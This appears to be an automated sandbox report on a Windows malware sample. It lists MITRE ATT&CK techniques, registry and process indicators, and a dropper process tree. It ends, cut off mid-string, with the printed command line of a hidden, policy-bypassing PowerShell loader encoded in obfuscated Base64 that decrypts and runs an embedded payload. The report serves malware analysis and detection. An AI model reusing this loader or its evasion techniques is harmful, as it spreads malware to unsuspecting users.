Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5512	PING.EXE
2728	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2772	cmd.exe
5092	netsh.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Yhihb8G.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Yhihb8G.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2696	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	rapes.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5696	reg.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
5512	PING.EXE
2728	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
7156	schtasks.exe
5276	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3824	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4284	random.exe
4284	random.exe
4616	rapes.exe
4616	rapes.exe
3824	powershell.exe
3824	powershell.exe
5520	powershell.exe
5520	powershell.exe
5520	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
5792	powershell.exe
5792	powershell.exe
4360	Yhihb8G.exe
4360	Yhihb8G.exe
4360	Yhihb8G.exe
5792	powershell.exe
5428	9sWdA2p.exe
5428	9sWdA2p.exe
5428	9sWdA2p.exe
5428	9sWdA2p.exe
5428	9sWdA2p.exe
5428	9sWdA2p.exe
5960	88973ce112.exe
5960	88973ce112.exe
1028	rapes.exe
1028	rapes.exe
5728	MSBuild.exe
5728	MSBuild.exe
5728	MSBuild.exe
5728	MSBuild.exe
2880	P3Ow4LV.exe
5400	powershell.exe
5400	powershell.exe
5400	powershell.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2880	P3Ow4LV.exe
2568	updater.exe
2284	powershell.exe
2284	powershell.exe
2284	powershell.exe
2568	updater.exe
2568	updater.exe
2568	updater.exe
2568	updater.exe
2568	updater.exe
2568	updater.exe
2568	updater.exe
2568	updater.exe
2568	updater.exe
2568	updater.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3824	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
3756	1f52e62d.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
5824	UZPt0hR.exe
5824	UZPt0hR.exe
5824	UZPt0hR.exe
944	CamMenuMaker.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	3824	powershell.exe
Token: SeDebugPrivilege	5520	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeDebugPrivilege	4360	Yhihb8G.exe
Token: SeDebugPrivilege	5792	powershell.exe
Token: SeDebugPrivilege	5400	powershell.exe
Token: SeShutdownPrivilege	3588	powercfg.exe
Token: SeCreatePagefilePrivilege	3588	powercfg.exe
Token: SeShutdownPrivilege	1748	powercfg.exe
Token: SeCreatePagefilePrivilege	1748	powercfg.exe
Token: SeShutdownPrivilege	4520	powercfg.exe
Token: SeCreatePagefilePrivilege	4520	powercfg.exe
Token: SeShutdownPrivilege	2348	powercfg.exe
Token: SeCreatePagefilePrivilege	2348	powercfg.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeShutdownPrivilege	3092	powercfg.exe
Token: SeCreatePagefilePrivilege	3092	powercfg.exe
Token: SeShutdownPrivilege	5612	powercfg.exe
Token: SeCreatePagefilePrivilege	5612	powercfg.exe
Token: SeShutdownPrivilege	5696	powercfg.exe
Token: SeCreatePagefilePrivilege	5696	powercfg.exe
Token: SeShutdownPrivilege	1056	powercfg.exe
Token: SeCreatePagefilePrivilege	1056	powercfg.exe
Token: SeLockMemoryPrivilege	3836	explorer.exe
Token: SeDebugPrivilege	3084	server.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: 33	3084	server.exe
Token: SeIncBasePriorityPrivilege	3084	server.exe
Token: SeDebugPrivilege	6388	powershell.exe
Token: 33	3084	server.exe
Token: SeIncBasePriorityPrivilege	3084	server.exe
Token: 33	3084	server.exe
Token: SeIncBasePriorityPrivilege	3084	server.exe
Token: 33	3084	server.exe
Token: SeIncBasePriorityPrivilege	3084	server.exe
Token: 33	3084	server.exe
Token: SeIncBasePriorityPrivilege	3084	server.exe
Token: SeDebugPrivilege	3756	1f52e62d.exe
Token: SeBackupPrivilege	3756	1f52e62d.exe
Token: SeRestorePrivilege	3756	1f52e62d.exe
Token: SeLoadDriverPrivilege	3756	1f52e62d.exe
Token: SeShutdownPrivilege	3756	1f52e62d.exe
Token: SeSystemEnvironmentPrivilege	3756	1f52e62d.exe
Token: SeSecurityPrivilege	3756	1f52e62d.exe
Token: 33	3084	server.exe
Token: SeIncBasePriorityPrivilege	3084	server.exe
Token: SeCreateGlobalPrivilege	232	dwm.exe
Token: SeChangeNotifyPrivilege	232	dwm.exe
Token: 33	232	dwm.exe
Token: SeIncBasePriorityPrivilege	232	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4284 wrote to memory of 4616	4284	random.exe	89
PID 4284 wrote to memory of 4616	4284	random.exe	89
PID 4284 wrote to memory of 4616	4284	random.exe	89
PID 4616 wrote to memory of 3616	4616	rapes.exe	95
PID 4616 wrote to memory of 3616	4616	rapes.exe	95
PID 4616 wrote to memory of 3616	4616	rapes.exe	95
PID 3616 wrote to memory of 5656	3616	cmd.exe	97
PID 3616 wrote to memory of 5656	3616	cmd.exe	97
PID 3616 wrote to memory of 5656	3616	cmd.exe	97
PID 5656 wrote to memory of 3824	5656	cmd.exe	99
PID 5656 wrote to memory of 3824	5656	cmd.exe	99
PID 5656 wrote to memory of 3824	5656	cmd.exe	99
PID 4616 wrote to memory of 2516	4616	rapes.exe	102
PID 4616 wrote to memory of 2516	4616	rapes.exe	102
PID 4616 wrote to memory of 2516	4616	rapes.exe	102
PID 2516 wrote to memory of 3784	2516	cmd.exe	104
PID 2516 wrote to memory of 3784	2516	cmd.exe	104
PID 2516 wrote to memory of 3784	2516	cmd.exe	104
PID 3824 wrote to memory of 5520	3824	powershell.exe	106
PID 3824 wrote to memory of 5520	3824	powershell.exe	106
PID 3824 wrote to memory of 5520	3824	powershell.exe	106
PID 3784 wrote to memory of 412	3784	cmd.exe	108
PID 3784 wrote to memory of 412	3784	cmd.exe	108
PID 3784 wrote to memory of 412	3784	cmd.exe	108
PID 4616 wrote to memory of 4360	4616	rapes.exe	109
PID 4616 wrote to memory of 4360	4616	rapes.exe	109
PID 4616 wrote to memory of 4360	4616	rapes.exe	109
PID 412 wrote to memory of 5792	412	powershell.exe	110
PID 412 wrote to memory of 5792	412	powershell.exe	110
PID 412 wrote to memory of 5792	412	powershell.exe	110
PID 4360 wrote to memory of 2772	4360	Yhihb8G.exe	112
PID 4360 wrote to memory of 2772	4360	Yhihb8G.exe	112
PID 4360 wrote to memory of 2772	4360	Yhihb8G.exe	112
PID 2772 wrote to memory of 5808	2772	cmd.exe	116
PID 2772 wrote to memory of 5808	2772	cmd.exe	116
PID 2772 wrote to memory of 5808	2772	cmd.exe	116
PID 2772 wrote to memory of 5092	2772	cmd.exe	118
PID 2772 wrote to memory of 5092	2772	cmd.exe	118
PID 2772 wrote to memory of 5092	2772	cmd.exe	118
PID 2772 wrote to memory of 3124	2772	cmd.exe	119
PID 2772 wrote to memory of 3124	2772	cmd.exe	119
PID 2772 wrote to memory of 3124	2772	cmd.exe	119
PID 4616 wrote to memory of 5428	4616	rapes.exe	120
PID 4616 wrote to memory of 5428	4616	rapes.exe	120
PID 4616 wrote to memory of 5428	4616	rapes.exe	120
PID 4616 wrote to memory of 2880	4616	rapes.exe	122
PID 4616 wrote to memory of 2880	4616	rapes.exe	122
PID 4616 wrote to memory of 5960	4616	rapes.exe	130
PID 4616 wrote to memory of 5960	4616	rapes.exe	130
PID 4616 wrote to memory of 5960	4616	rapes.exe	130
PID 5960 wrote to memory of 5844	5960	88973ce112.exe	132
PID 5960 wrote to memory of 5844	5960	88973ce112.exe	132
PID 5960 wrote to memory of 5844	5960	88973ce112.exe	132
PID 5960 wrote to memory of 5844	5960	88973ce112.exe	132
PID 5960 wrote to memory of 5844	5960	88973ce112.exe	132
PID 5960 wrote to memory of 5844	5960	88973ce112.exe	132
PID 5960 wrote to memory of 5844	5960	88973ce112.exe	132
PID 5960 wrote to memory of 5844	5960	88973ce112.exe	132
PID 5960 wrote to memory of 5844	5960	88973ce112.exe	132
PID 4616 wrote to memory of 4452	4616	rapes.exe	133
PID 4616 wrote to memory of 4452	4616	rapes.exe	133
PID 4452 wrote to memory of 936	4452	TbV75ZR.exe	134
PID 4452 wrote to memory of 936	4452	TbV75ZR.exe	134
PID 4452 wrote to memory of 936	4452	TbV75ZR.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4284
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4616
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10432611121\SURG9Yv.cmd"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3616
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10432611121\SURG9Yv.cmd"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5656
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hn